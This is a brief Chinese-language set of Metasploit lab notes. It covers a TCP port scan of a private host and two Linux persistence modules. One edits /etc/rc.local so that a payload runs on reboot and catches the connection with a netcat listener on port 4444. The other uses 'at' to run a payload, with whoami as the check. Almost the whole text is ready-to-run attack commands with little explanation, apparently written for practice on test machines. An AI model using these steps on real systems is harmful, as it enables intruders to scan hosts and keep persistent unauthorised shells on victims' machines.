msfconsole

端口扫描
msf6 > search portscan
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set ports 1-2048
ports => 1-2048
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.191
rhosts => 192.168.1.191
msf6 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf6 auxiliary(scanner/portscan/tcp) > run

测试机：ubuntu16-server，存在/etc/rc.local
此模块将编辑 /etc/rc.local 以保留有效负载。有效负载将在下次重新启动时执行
exploit/linux/local/rc_local_persistence
set SESSION session-id
set lhost 攻击者ip
set lport 4444
攻击者：nc -lvvp 4444
重启受害者机器测试

此模块通过 at 执行有效负载来实现持久性
exploit/unix/local/at_persistence
set SESSION session-id
exploit
不用新建nc进行端口监听测试，直接等待2s，直接输入whoami验证